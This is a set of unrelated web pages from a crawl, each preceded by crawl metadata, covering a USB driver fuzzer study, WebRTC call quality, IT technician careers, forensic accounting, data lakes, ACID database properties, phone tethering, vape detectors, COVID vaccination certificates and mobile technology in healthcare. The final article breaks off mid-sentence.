<urn:uuid:5e17086a-aa89-42f4-be32-dd142e7d3438>
CC-MAIN-2024-38
https://www.metricstream.com/blog/cyber-resilience-new-paradigm-cyber-risk-management
2024-09-14T16:32:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00224.warc.gz
en
0.935574
1,261
2.578125
3
Academics say they have found 26 new vulnerabilities in the USB driver stack that operating systems like Linux , macOs, Windows and FreeBSD employ. The research team, consisting of Purdue University’s Hui Peng and Swiss Federal Institute of Technology Lausanne’s Mathias Payer, said all the bugs were found using a new tool they developed, called USBFuzz. The tool is what security practitioners call a fuzzer. Fuzzers are applications that allow security researchers to submit large quantities of null, unwanted, or random data into other programs as inputs. Security researchers then analyze how the software being tested conducts the discovery of new bugs, some of which may be maliciously exploited. A New Portable USB Fuzzer Built by Academics Peng and Payer created USBFuzz to test USB drivers, a new fuzzer designed specifically for testing the USB driver stack of modern-day operating systems. “USBFuzz uses a software-emulated USB device at its heart to provide drivers with random device data (when they conduct IO operations),” the investigators said. “As the emulated USB interface works at system level, it is straightforward to port it to other platforms.” This enabled the research team not only to test USBFuzz on Linux, where most fuzzer programs work, but other operating systems too. Researchers have said USBFuzz was checked on: - 9 recent versions of the Linux kernel: v4.14.81, v4.15,v4.16, v4.17, v4.18.19, v4.19, v4.19.1, v4.19.2, and v4.20-rc2 (the latest version at the time of evaluation) - FreeBSD 12 (the latest release) - MacOS 10.15 Catalina (the latest release) - Windows (both version 8 and 10, with most recent security updates installed) Study Team Finds 26 New Bugs After their experiments the research team said they found a total of 26 new bugs with the help of USBFuzz. Researchers found one bug in FreeBSD, three in MacOS (two resulting in an unplanned reset and one freezing of the system), and four in Windows 8 and 10 (resulting in Death’s Blue Screens). But the vast majority, and the most serious, of bugs were found in Linux — 18 in all. Sixteen were high-security impact memory bugs in different Linux subsystems (USB core, USB sound, and network), one bug resided in the Linux USB host controller driver, and the last one was in a USB camera driver. Peng and Payer said they reported these bugs to the Linux kernel team and suggested patches to reduce “the burden on the kernel developers while addressing the identified vulnerabilities.” Of the 18 Linux bugs, 11 have received a patch since their initial reports last year, the research team said. Ten of those 11 bugs were also given a CVE, a special code assigned to major security vulnerabilities. Further updates for the remaining seven problems are also expected in the immediate future. “The remaining bugs fall into two classes: those still being published under embargo and those discovered and documented simultaneously by other researchers,” said the researchers. USBFuzz is Open Source Yesterday Payer released a draft of a white paper from the research team detailing their work on USBFuzz. Peng and Payer are planning to present their research at the Virtual Security Conference at Usenix Security Symposium, scheduled for August 2020. Similar work has been done in the past. In November 2017, a security engineer from Google used a Google-made fuzzer called syzkaller to discover 79 bugs affecting USB drivers on the Linux kernel. Peng and Payer said that USBFuzz is superior to previous tools like vUSBf, syzkaller, and usb-fuzzer because their tool gives testers more control over the test data and is also portable across operating systems, contrary to all of the above, which usually only work on * NIX systems. Following Peng and Payer’s Usenix talk USBFuzz is expected to be published on GitHub as an open source project. The repo can be found here.
<urn:uuid:510709c4-9635-44c6-8a8e-4b0b48324ffe>
CC-MAIN-2024-38
https://cybersguards.com/26-usb-bugs-found-in-linux-windows-macos-and-freebsd/
2024-09-15T23:03:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00124.warc.gz
en
0.942298
893
2.671875
3
What is WebRTC WebRTC (Real-Time Communications) is part of the technology Blitzz uses to connect two or more people on a video call. It acts as a middleman that packages, and compresses data from a video session (e.g., audio created from a conversation, and video captured from the webcam). An encoder compresses this data into Packets. These get sent across your wifi network to whoever you're on talking to. The data stream is condensed so it can be relayed across the network to your participant instantaneously. We refer to everyone as "Endpoints," and each sends their data stream to the other while the connection is live. How it relates to Calling quality There are a few reasons why a video session can be choppy, sound bad, or drop altogether. The Data packets being sent to and from each device can get lost in transit. Packet Loss is often caused by - High Latency (the time it takes to transfer data packets between endpoints) - Congested/inadequate bandwidth (the transfer rate at which data gets sent through your wifi network) - Spotty connection (device too far away from wifi source/physical or electrical interference) Only one participant has to have these problems for both endpoints to be affected. Each endpoint should have a stable connection to wifi, and enough open bandwidth to transfer/receive data simultaneously.
<urn:uuid:bd45d4b6-f014-4ecf-a402-cf9e856f7fef>
CC-MAIN-2024-38
https://help.blitzz.co/en/support/solutions/articles/44001949917-webrtc-what-it-is-and-how-it-relates-to-video-call-quality-
2024-09-17T05:48:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00024.warc.gz
en
0.958343
291
3.296875
3
In order to know whether or not you would like to become a computer technician you will need to know a little more about what the IT Technician career entails. There is a continuously growing demand for professionals in this field as technology evolves and finds an ever increasing number of roles in modern society. Computer Repair Technician, Desktop Support, IT Technician and Support Technician are all job roles that fulfil the need for these skilled IT workers. The specific duties and responsibilities of these roles can vary based on the requirements of the specific organisation but to become a computer technician you should have the skills to fulfil tasks such as: - Installing PC Hardware - Installing PC Software - Computer Repair - Maintaining equipment - Providing desktop support - Troubleshooting a vast range of computer issues - Configuring computer networks 10 Tips to Become a Computer Technician 1. Get your CompTIA A+ Certification One of the best foundations to ensure a great start when you decide to become a computer technician is to gain the right qualifications. CompTIA A+ is one of the most sought-after entry-level certifications in this field and most IT jobs require this as a basis. The course can be studied via online training so this is a qualification that you can work towards in your own time and at your own pace. The CompTIA A+ certification is considered to be a standard requirement when you are looking to become a computer technician so having this on your CV will be highly beneficial. 2. Practice Computer Repair When you become a computer technician a large part of your job will consist of computer repair. This is a vital part of desktop support and will require that you are able to repair PC hardware, software and accessories such as printer and scanners. As an aspiring IT Technician, you can gain a vast amount of practical experience by repairing broken computers belonging to friends and family. If you are able to, source unwanted broken computers and spend time figuring out what you are able to fix and learn from what you have discovered. 3. Build a Computer Although it will not necessarily be a part of your job when you become a computer technician, building computers can teach you as much as computer repair can and this is a great learning tool for those who learn through practical application. When buying the different components, you will learn about the internal structure of a computer and this will provide a wealth of knowledge. To become a computer technician you will need to know computers in a very detailed manner and building one from scratch is a significant learning curve. 4. Volunteer in Desktop Support One of the quickest and easiest ways in which to gain the practical experience that will assist your goal to become a computer technician is to do volunteer work. Work at a local small business, a school or wherever you can find someone who is in need of computer repair or other aspects of desktop support. If possible, request that each of these places write you a recommendation letter stating that you have partaken in volunteer IT Technician work and what you have done during your time with them. These could prove helpful when applying for a job to become a computer technician. 5. Create a Search Friendly CV Now that you have a relevant certification or two and have added practical experience to your inventory, it is necessary to ensure that your CV will get noticed by those recruiters who are hiring. There is fierce competition for IT Technician roles and recruiters are often swamped by the masses of applications that they receive. This has led to the use of filtering features and it is vital that you consider these when constructing your CV. Ensure that you clearly note any IT certifications that you have earned (CompTIA A+ is often used in the filtering process), mention any practical experience that you have gained (even if this is simply helping your friends and family with computer repair) and do not clutter your CV with unnecessary information or details – interviews are for the recruiter to ask for further information relating to the areas of your CV that have caught their attention. 6. Compile your own Guidance Database This can prove to be a very useful resource at any time during your career as an IT Technician and it can also help you along your path to become a computer technician. Your Guidance Database can consist of anything that will help you with your career – tutorial videos, helpful websites, repair manuals, self-made notes, study guides or anything else that may come in handy. 7. Accept Any IT Job Offer With the high levels of competition for positions as an IT Technician, it is advisable to accept any formal job offer that is presented to you when you are first trying to become a computer technician. This will provide you with on-the-job experience and the ability to learn more and add a paying IT Technician, Computer Repair or Desktop Support role to your CV. 8. Learn from other IT Technicians Do not make the mistake of thinking that because you have now become a computer technician; you have nothing left to learn. The field of IT is always changing and there is always something new to learn. Learning from other IT Technicians is a fantastic way to increase your knowledge and skills and enhance your career potential. 9. Maintain Professional Integrity Once you have become a computer technician you will begin to build your IT career from that basis. This applies whether you wish to remain in this career path or move towards a particular specialisation. Maintaining professional integrity is vital in order to develop a strong working reputation and having a sound work ethic is important both before and after you become a computer technician. 10. Work Smart Although it is obviously important to work hard to become a computer technician and to further your career once you have gained your first IT Technician position; it is equally necessary to work smart. Focus on the areas where your weaknesses lie so that you can improve on them and keep an eye out for areas that you excel in as potential for a specialist career. Become a Computer Technician Today The first step in order to become a computer technician is training. If you are considering the online study route, it is advised that you study through an accredited training provider so that you can be assured that your IT Technician training is recognised and will thoroughly prepare you for the exams that are beneficial to achieving your goal to become a computer technician. ITonlinelearning is CompTIA accredited and will assist you with an affordable and flexible training option to get you started.
<urn:uuid:de87ea2f-4bd4-4ce9-893e-bb81ae93c7c6>
CC-MAIN-2024-38
https://www.itonlinelearning.com/blog/10-tips-to-help-you-become-a-computer-technician/
2024-09-17T04:54:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00024.warc.gz
en
0.964308
1,301
2.5625
3
Forensic accounting is one of the little covered types of accounting because not many individuals are willing to venture into it. However, it is a very lucrative field where they can earn a six-figure salary. To understand more about this form of accounting, read on. About Forensic Accounting Forensic accounting is a type of accounting that helps clients discover economic information. It is used in a court of law, which is why forensic accountants are bound to appear in court to provide expert evidence. Because this form of accounting is exotic in nature, only large accounting firms and boutique firms have their own forensic accounting departments set up. Types of Forensic Accounting There are a few branches of forensic accounting which are offered by major accounting companies, and those are: Necessities of Forensic Accounting Forensic accounting depends on understanding the company or person under investigation fully. Therefore, information on how much the person or company makes, the business’ value in the market, and other important information. This data can be collected from financial statements, bank statements and credit statements. However, any other financial document will also be helpful in this type of accounting. Forensic accounting is an important tool for companies and individuals to ensure their compliance with their industry’s best practices. Therefore, its need will continue as long as business operations are run.
<urn:uuid:64f65678-8621-4ba7-9962-d535be1a58d5>
CC-MAIN-2024-38
http://www.best-practice.com/best-practice-in-reporting-accounting/types-of-accounting/forensic-accounting/
2024-09-19T13:40:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00724.warc.gz
en
0.966364
270
2.703125
3
I don’t think it’s an overstatement to say that data is pretty important. Data is especially important for modern organizations. In fact, The Economist went so far as to say that data has surpassed oil as the world’s most valuable resource, and that was back in 2017. One of the problems with data, though, is the massive amounts of it that need to be processed on a daily basis. There’s so much data being generated across the globe these days that we have to come up with a new term just to express how much data there is: big data. Sure, it’s not the most impressive-sounding term out there, but the fact remains. With all this big data out there, organizations are seeking ways to improve how they manage it all from a practical, computational, and security standpoint. Like Spiderman’s Uncle Ben once said: “With great [data] comes great responsibility.” The best method the IT world has created for navigating the complexities of data management is through the use of databases. What is a database? Databases are structured sets of data that are stored within computers. Oftentimes, databases are stored on entire server farms filled with computers that were made specifically for the purpose of handling that data and the processes necessary for making use of it. Modern databases are such complex systems that management systems have been designed to handle them. These database management systems (DBMS) seek to optimize and manage the storage and retrieval of data within databases. One of the guiding stars leading organizations to successful database management is the ACID approach. What is ACID? In the context of computer science, ACID stands for: Together, ACID is a set of guiding principles that ensure database transactions are processed reliably. A database transaction is any operation performed within a database, such as creating a new record or updating data within one. Changes made within a database need to be performed with care to ensure the data within doesn’t become corrupted. Applying the ACID properties to each modification of a database is the best way to maintain the accuracy and reliability of a database. Let’s look at each component of ACID. In the context of databases, atomicity means that you either: - Commit to the entirety of the transaction occurring - Have no transaction at all Essentially, an atomic transaction ensures that any commit you make finishes the entire operation successfully. Or, in cases of a lost connection in the middle of an operation, the database is rolled back to its state prior to the commit being initiated. This is important for preventing crashes or outages from creating cases where the transaction was partially finished to an unknown overall state. If a crash occurs during a transaction with no atomicity, you can’t know exactly how far along the process was before the transaction was interrupted. By using atomicity, you ensure that either the entire transaction is successfully completed—or that none of it was. Consistency refers to maintaining data integrity constraints. A consistent transaction will not violate integrity constraints placed on the data by the database rules. Enforcing consistency ensures that if a database enters into an illegal state (if a violation of data integrity constraints occurs) the process will be aborted and changes rolled back to their previous, legal state. Another way of ensuring consistency within a database throughout each transaction is by also enforcing declarative constraints placed on the database. An example of a declarative constraint might be that all customer accounts must have a positive balance. If a transaction would bring a customer account into a negative balance, that transaction would be rolled back. This ensures changes are successful at maintaining data integrity or they are canceled completely. Isolated transactions are considered to be “serializable”, meaning each transaction happens in a distinct order without any transactions occurring in tandem. Any reads or writes performed on the database will not be impacted by other reads and writes of separate transactions occurring on the same database. A global order is created with each transaction queueing up in line to ensure that the transactions complete in their entirety before another one begins. Importantly, this doesn’t mean two operations can’t happen at the same time. Multiple transactions can occur as long as those transactions have no possibility of impacting the other transactions occurring at the same time. Doing this can have impacts on the speed of transactions as it may force many operations to wait before they can initiate. However, this tradeoff is worth the added data security provided by isolation. Isolation can be accomplished through the use of a sliding scale of permissiveness that goes between what are called optimistic transactions and pessimistic transactions: - An optimistic transaction schema assumes that other transactions will complete without reading or writing to the same place twice. With the optimistic schema, both transactions will be aborted and retried in the case of a transaction hitting the same place twice. - A pessimistic transaction schema provides less liberty and will lock down resources on the assumption that transactions will impact other ones. This results in fewer abort and retries, but it also means that transactions are forced to wait in line for their turn more often in comparison to the optimistic transaction approach. Finding a sweet spot between these two ideals is often where you’ll find the best overall result. The final aspect of the ACID approach to database management is durability. Durability ensures that changes made to the database (transactions) that are successfully committed will survive permanently, even in the case of system failures. This ensures that the data within the database will not be corrupted by: - Service outages - Other cases of failure Durability is achieved through the use of changelogs that are referenced when databases (or portions of the database) are restarted. ACID supports data integrity & security When every aspect of the ACID approach is brought together successfully, databases are maintained with the utmost data integrity and data security to ensure that they continuously provide value to the organization. A database with corrupted data can present costly issues due to the huge emphasis that organizations place on their data for both day-to-day operations as well as strategic analysis. Using ACID properties with your database will ensure your database continues to deliver valuable data throughout operations. - BMC Machine Learning & Big Data Blog - Data Architecture Explained: Components, Standards & Changing Architectures - CAP Theorem for Databases: Consistency, Availability & Partition Tolerance - Data Streaming Explained: Pros, Cons & How It Works - Data Ethics for Companies - 3 Simple Data Monetization Strategies for Companies
<urn:uuid:ca9f829e-8903-41cf-b284-07aefee7e169>
CC-MAIN-2024-38
https://www.bmc.com/blogs/acid-atomic-consistent-isolated-durable/
2024-09-07T13:43:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00088.warc.gz
en
0.942071
1,361
3.140625
3
In today’s fast-paced world, staying connected is essential. Whether you’re working remotely, studying, or just browsing the web, having a reliable internet connection is crucial. One way to ensure you’re always connected is by using your phone’s internet connection to access the web on your laptop. In this guide, we’ll show you how to connect internet on phone to laptop and discuss the types of tests you can perform to ensure your connection is secure. To connect internet on your phone to your laptop, you can use methods like USB tethering, Wi-Fi hotspot, or Bluetooth tethering. USB tethering involves connecting your phone to your laptop using a USB cable and enabling USB tethering in your phone’s settings. For a Wi-Fi hotspot, you enable the hotspot on your phone and connect your laptop to it like any other Wi-Fi network. Bluetooth tethering requires pairing your phone with your laptop via Bluetooth and enabling tethering on your phone. After you learn how to connect internet on phone to laptop, it’s important to perform security tests to ensure your connection is secure. These tests can include checking your firewall settings, running an anti-virus scan, and performing a network security scan. By following these steps, you can enjoy a secure and reliable internet connection on your laptop using your phone’s internet. Connecting the Internet from Your Phone to Laptop There are several methods you can use to connect the internet on your phone to your laptop. The most common methods include using a USB cable, setting up a Wi-Fi hotspot, or using Bluetooth. Here’s how you can do it: - USB Tethering In how to connect internet on phone to laptop using a USB cable, start by ensuring your phone’s data plan supports tethering. Connect your phone to your laptop using a USB cable. On your phone, go to Settings > Network & Internet > Hotspot & tethering, and enable USB tethering. This allows your phone to share its internet connection with your laptop through the USB cable. On your laptop, a new network connection should appear, representing your phone’s internet connection. Select this network to connect. You may need to wait a few moments for the connection to be established. USB tethering is a reliable method for connecting your phone’s internet to your laptop, especially when you need a stable connection or when Wi-Fi is unavailable. It provides a secure connection and allows you to use your phone’s data plan to access the internet on your laptop. Additionally, USB tethering can be faster than some wireless methods, making it ideal for tasks that require a high-speed connection, such as streaming video or downloading large files. - Wi-Fi Hotspot This method allows you to create a Wi-Fi network from your phone that your laptop can connect to. – On your phone, go to Settings > Network & Internet > Hotspot & tethering. – Enable the Wi-Fi hotspot option. – On your laptop, search for available Wi-Fi networks and select your phone’s hotspot network. – Enter the password if prompted. - Bluetooth Tethering In how to connect internet on phone to laptop using Bluetooth, start by pairing your phone with your laptop. Enable Bluetooth on both devices and ensure they are discoverable. On your phone, go to Settings > Network & Internet > Hotspot & tethering, and enable Bluetooth tethering. This allows your phone to share its internet connection with your laptop via Bluetooth. On your laptop, open the Bluetooth settings and search for your phone’s Bluetooth network. Once you find it, select it to connect. You may need to enter a passcode, which is usually displayed on your phone. Once connected, your laptop will be able to access the internet through your phone’s data connection. Bluetooth tethering is a convenient way to share your phone’s internet connection with your laptop when you don’t have access to Wi-Fi or a USB cable. It’s easy to set up and provides a secure connection between your devices. Types of Tests to Ensure Security Once you’ve connected your phone’s internet to your laptop, it’s important to perform some security tests to ensure your connection is secure. Here are some tests you can perform: - Firewall Test How to connect internet on phone to laptop securely? Check if your laptop’s firewall is enabled and configured correctly. The firewall acts as a barrier between your computer and potential threats, such as unauthorized access and malicious software. To test your firewall, you can use online tools like ShieldsUP! or GRC’s LeakTest. These tools can help you check for open ports and vulnerabilities that could be exploited by hackers. Ensuring your firewall is enabled and properly configured is crucial for protecting your laptop while using the internet through your phone. A firewall helps prevent unauthorized access to your computer and blocks malicious software from entering your system. By regularly testing your firewall and ensuring it is working correctly, you can help protect your devices and data from cyber threats. - Anti-virus Scan Run a full anti-virus scan on your laptop to check for any malicious software or viruses that could be present. – Make sure your anti-virus software is up to date and capable of detecting the latest threats. - Network Security Scan In how to connect internet on phone to laptop securely, perform a network security scan to identify vulnerabilities. Use tools like Nmap or Wireshark to check for open ports or potential security risks. These scans help ensure that your network configuration is secure, protecting your devices from potential threats while using the internet on your laptop through your phone. - Browser Security Test Check the security settings of your web browser to ensure they are configured correctly. – Disable any unnecessary plugins or extensions that could potentially expose your browser to security risks. - Update Software In how to connect internet on phone to laptop securely, keep both devices up to date. Ensure your phone and laptop’s operating systems and applications are regularly updated. Updates often include security patches that protect against vulnerabilities. By keeping your devices updated, you can maintain a secure connection while accessing the internet on your laptop through your phone. Connecting the internet from your phone to your laptop opens up a world of possibilities, allowing you to work, study, or relax online from virtually anywhere. However, ensuring a secure connection is paramount to protect your data and privacy. To connect the internet on your phone to your laptop, begin by choosing a reliable method such as USB tethering, Wi-Fi hotspot, or Bluetooth tethering. USB tethering is a straightforward option that utilizes a USB cable to connect your devices. Wi-Fi hotspot creates a wireless network using your phone’s data, while Bluetooth tethering uses Bluetooth technology to establish a connection. After establishing the connection, it’s crucial to perform security tests to safeguard your devices. Check your firewall settings, run an anti-virus scan, and conduct a network security scan to identify any vulnerabilities. Additionally, ensure your web browser and operating system are up to date to protect against the latest threats. By following these steps on how to connect internet on phone to laptop and performing these tests, you can enjoy a secure connection and peace of mind while using the internet on your laptop through your phone. Bytagig is dedicated to providing reliable, full-scale cyber security and IT support for businesses, entrepreneurs, and startups in a variety of industries. Bytagig works both remotely with on-site support in Portland, San Diego, and Boston. Acting as internal IT staff, Bytagig handles employee desktop setup and support, comprehensive IT systems analysis, IT project management, website design, and more. Bytagig is setting the standard for MSPs by being placed on Channel Future’s NexGen 101 list. Share this post:
<urn:uuid:4506c807-9252-483b-abac-3a31fd806908>
CC-MAIN-2024-38
https://www.bytagig.com/articles/14596/
2024-09-07T15:05:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00088.warc.gz
en
0.885658
1,660
2.640625
3
Manufacturers have been a lower risk than businesses in health and financial sectors when it comes to cyber attacks, but that is changing due to the ‘Industrial Internet of Things’. With more devices being interconnected and connected to the internet, you are exposed to new levels of cyber risk. Many of these devices were not designed to face cyber attacks, such as: 1) Operational downtime: Cyber attackers disable production. 2) Product manipulation: Attackers can program in errors that could change the way a product is produced to cause faulty products and recalls. 3) Information theft: Just two weeks ago, a US corporation accused the Chinese of stealing sensitive and proprietary manufacturing production methods, allowing the Chinese to copy proprietary material that this company is producing. For secrets that include formulas, like Coca-Cola’s secret recipe, it would have huge consequences on their financial and competitive advantage. Have you reviewed your cybersecurity to understand your level of risk? Even if you have IT resources, they are not always experienced in risk rating and remediation. We can help.
<urn:uuid:32ecb899-ad16-400f-8c94-7a26d926a4d2>
CC-MAIN-2024-38
https://foresite.com/blog/manufacturers-cyber-risk-is-increasing/
2024-09-08T15:37:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00888.warc.gz
en
0.961741
218
2.765625
3
The shift from cigarettes to vaping may have health benefits, but it brings its own set of challenges. Around 4.5% of US adults vape, a number that jumps to 11% among 18 to 24-year-olds. The growth in vaping has sparked concerns about its use in public and private spaces. Despite laws against vaping in many areas, detecting it on private property poses challenges. To tackle this, businesses and facility managers are turning to vape detectors. These devices send live alerts and sound alarms, aiding in the detection and deterrence of vaping incidents. What Are Vape Detectors? Vape detectors are specialized sensors that pick up vaping activity in prohibited areas. These devices, which are essential in places like schools and private businesses, not only help in identifying vaping incidents but also act as deterrents. How Vape Detectors Work Vape detectors monitor air quality for chemicals and particles unique to vaping. If these particles exceed a certain threshold, the system sends alerts and can trigger an audible alarm. Types of sensors include: - Particulate sensors detect aerosols from vaping. - Gas sensors identify vaping-related gasses. - Combination sensors improve accuracy by detecting a broader range of substances. Integrating vape sensors with security technologies like IoT devices and IP cameras can enhance detection capabilities. The Accuracy and Sensitivity of Vape Detectors Understanding the performance of vape detectors is crucial. They must be sensitive enough to detect the lower particulate matter levels in vape smoke compared to cigarette smoke. Factors affecting performance include airflow, coverage area, and the potential for false positives. The Challenge of Detecting Vaping Without Sensors Detecting vaping without specialized sensors is difficult. Vape smoke dissipates quickly and doesn’t have a strong odor, making it hard to spot. Variations in e-cigarette models also complicate detection. Beneficiaries of Vape Detection Systems Several sectors can benefit from vape detection, including: - Private businesses to maintain a smoke-free environment. - Educational institutions to combat the rising trend of vaping among students. - Residential properties to enforce no-smoking policies. - Healthcare facilities to ensure a healthy environment. - Public spaces to comply with laws against vaping. For property and facility managers striving to uphold vaping regulations and ensure safety, implementing a vape detection system is crucial. Through meticulous consideration of power sources, false positive mitigation, vandalism prevention, coverage requirements, and integration possibilities with existing security systems, stakeholders can deploy a reliable solution. Maxxess Systems’ eFusion stands out as a valuable technology offering seamless integration capabilities, empowering stakeholders to effectively tackle the contemporary challenge of vaping detection and deterrence. Have questions? Let’s talk!
<urn:uuid:6f05875e-7661-465d-a698-f254c73dc0f1>
CC-MAIN-2024-38
https://maxxess-systems.com/2024/04/guide-to-vape-detection-in-buildings/
2024-09-08T15:24:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00888.warc.gz
en
0.906759
556
3.015625
3
Israel is probably the most advanced to date in terms of COVID19 vaccination. With more than one third of the residents fully inoculated, life can almost get back to pseudo-normal. This, however, requires being able to tell the vaccinated people apart from those who are not. The green pass, or vaccination certificate, is made to achieve precisely that. Technically, this government-issued certificate is not substantially different than a driver’s license, just that it’s shorter lived, can be stored in a phone app, and most importantly: was designed in a hurry. For something that was launched so quickly, it seems to be decently architected, but slightly better work could still be done to protect that piece of attestation that is so critical to public health. What do we require of a vaccination certificate? Not much, really. It obviously needs to be as secure as it could be made under the strict cost and distribution constraints. The certificate has to also be easily renewable (it currently expires every six months), and it has to be verifiable by a wide range of checkpoints with varying capabilities. Finally, verification has to be both reliable and fast; entry into a shopping mall cannot resemble passport control, and people cannot arbitrarily be locked out of key facilities just because of simple IT downtime. The certificate itself is sent to its holder by e-mail (or via a web-site), to be printed at home. There are no measures that could be taken to prevent anyone with Microsoft Paint from crafting fake such certificates. The digital part of the vaccination certificate, i.e., the QR Code printed on it, is the only part of the certificate that can practically be used against forgery. See the following write-up as a quick guide to cheap-but-secure attestation certificates; for COVID or otherwise. Continue reading "COVID vaccination certificates done almost right"
<urn:uuid:4475481d-0a21-46ca-b505-3d9309164a63>
CC-MAIN-2024-38
https://www.hbarel.com/archives/2021/02.html
2024-09-11T02:38:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00688.warc.gz
en
0.973314
387
2.515625
3
Data management has become a critical aspect of modern businesses. One concept that has gained significant attention in recent years is the data lake. This article aims to shed light on what a data lake is, its importance, and how it compares to similar concepts like the data warehouse. What is a data lake? A data lake is a vast storage repository that holds a significant amount of raw data in its native format until it is needed. Unlike a hierarchical data warehouse which stores data in files or folders, a data lake uses a flat architecture to store data. Each data element in a data lake is assigned a unique identifier and tagged with a set of extended metadata tags. When a business question arises, the data lake can be queried for relevant data, and that smaller set of data can then be analyzed to help answer the question. Data lakes are particularly useful for big data and real-time analytics, as they allow for the storage of structured, semi-structured, and unstructured data. Who needs a data lake? Organizations that deal with massive amounts of data can benefit significantly from a data lake. Industries like healthcare, banking, and retail, where data is continuously generated, can utilize data lakes for storing and analyzing their data. Enterprise data lakes are also becoming common in large organizations due to the scalability and flexibility they offer. Data lake vs data warehouse While both data lakes and data warehouses are used for storing data, they serve different purposes and have unique characteristics. A data lake, as already mentioned, stores raw, unprocessed data, allowing users to perform various types of analytics. On the other hand, a data warehouse is a repository for structured, filtered data that has already undergone processing. Traditional data warehouses and cloud data warehouses function best when answering specific, predetermined business questions, making them ideal for business intelligence activities. The data in a warehouse is already processed, cleaned, and organized, making it readily available for creating reports and dashboards. In contrast, data lakes can store all types of data, including unstructured and semi-structured data. They are built for broad data discovery tasks, machine learning, and advanced analytics. They have the flexibility to ask any question on any data, but the responsibility falls on the user to find, understand, and analyze that data. Thus, the choice between a data lake and a data warehouse depends on the specific use case, the nature and volume of the data, and the analytical goals of an organization. The value of data lakes Preservation of data in its original format In a data lake, storage of raw data occurs without the need for any initial processing or structuring. This approach ensures the preservation of data in its original form, allowing for more flexible and comprehensive analyses. Enabling advanced analytics Data lakes facilitate advanced analytics like machine learning and predictive analytics. With the vast volume of raw data at hand, businesses can extract meaningful insights and make data-driven decisions. Offering versatility and scalability Data lakes provide a highly versatile environment due to their ability to accommodate a wide variety of data types. Additionally, they offer scalability that traditional data storage methods often lack, making them ideal for organizations dealing with large volumes of data. The Future of Data Lakes Data lakes play an essential role in modern data management strategies. Data lake solutions offer flexibility, scalability, and cost-effectiveness that traditional data storage methods often lack. As businesses continue to generate and rely on data, the importance of effective data lake solutions will only increase.
<urn:uuid:ce47ab14-6408-486d-bbe3-a9f0754f5e30>
CC-MAIN-2024-38
https://www.ninjaone.com/it-hub/it-service-management/what-is-a-data-lake/
2024-09-11T04:00:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00688.warc.gz
en
0.926348
717
3.109375
3
A program for generating (mining) cryptocurrency. Most cryptocurrencies are issued in a decentralized manner by creating new blocks of “money” according to certain rules. The generation of each new unit of currency requires considerable computational resources. Miners utilize resources to find new hash sums and earn cryptocurrency for their owners. Miners installed on a device without the consent of its owner is malware (see Trojan miner). The name is sometimes applied to people who engage in mining.
<urn:uuid:d1f0cfc3-299a-4e3b-b391-118e40a4f83d>
CC-MAIN-2024-38
https://encyclopedia.kaspersky.com/glossary/miner/
2024-09-12T10:01:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651440.11/warc/CC-MAIN-20240912074814-20240912104814-00588.warc.gz
en
0.941157
93
2.609375
3
Mobile Technology is Shaping Humanity’s Future: Human beings have come a long way over the centuries. Throughout time, we’ve always looked for the most convenient and reliable way to communicate – whether it was through drums and horns, smoke signals, letters, or even in-person conversation. The rise of the digital world has given way to better opportunities for communication than ever before. Today, we can engage in conversations with people around the world, accessing real-time audio, video, and even text messaging at the touch of a button. Technology has played a pivotal role in making society a better place. The ability to access that technology via mobile devices like tablets and smartphones has changed the way that we interact with others, complete tasks, and even perform at work. According to Pew Research, more than 5 billion people around the world have a mobile device, and over half of those devices are smartphones. We’re living in an environment where it’s genuinely possible to be always on, and constantly connected. The question is, what does that mean to humanity as we know it? How does mobile technology serve communities across the globe? How Mobile Technology Transformed the Planet The chances are that your smartphone is an everyday part of your toolkit – a lightweight device that you carry with you wherever you go – whether you’re at home or at work. Despite being small enough to fit in your pocket, and lightweight enough that you’ll barely notice it throughout the day, the smartphone has played a monumental role in shaping human interactions throughout the 21st century. When the iPhone launched in 2007, we had no idea how significantly the communication landscape was about to change. Mobile devices suddenly became more than just phones or reading devices. Today, our devices are catch-all platforms for education, communication, and collaboration, with functionality that’s continually evolving and improving. The evolution of mobile technology means that everyone now has access to a pocket-sized PC – an environment that they can turn to for information, assistance, and even emergency support. We’re beginning to discover just how valuable the smartphone can be when it comes to things like healthcare and emergency services. The Role of Mobile Technology in Healthcare Mobile phones allow for easy communication between friends, coworkers, and family members at a moment’s notice. Not only can you connect with your tribe through voice with your smartphone, but you can also reach out through video, text message, and social media too. While this reliable access to various forms of communication has many benefits to offer, one of the areas where it can provide the most value is in healthcare. The rise of concepts like “Telemedicine,” which creates digital portals where doctors and patients can communicate at a distance, has transformed the way we think about healthcare. Hospital staff can provide diagnosis and treatment to support people in rural parts of a country without asking them to visit a treatment center. Healthcare companies can reduce the costs associated with keeping teams connected, no matter how globally dispersed healthcare experts may be. Healthcare portals even allow patients to communicate with physicians via their smartphones, providing instant updates about their condition, complete with information taken from wearable devices that monitor things like heart rate, blood pressure, and more. Qualcomm, a technology company in Arizona, recently partnered with the local healthcare program to use mobile technology to monitor pulmonary and cardiac patients. The patients wear a device connected to a mobile application. This application collects biometric data and sends that information to a physician so that the doctor can provide consistent, informed advice on how to manage a condition. The service also allows patients to set appointments and communicate with care managers through their devices, leading to significantly fewer hospitalizations in the patients monitored. By 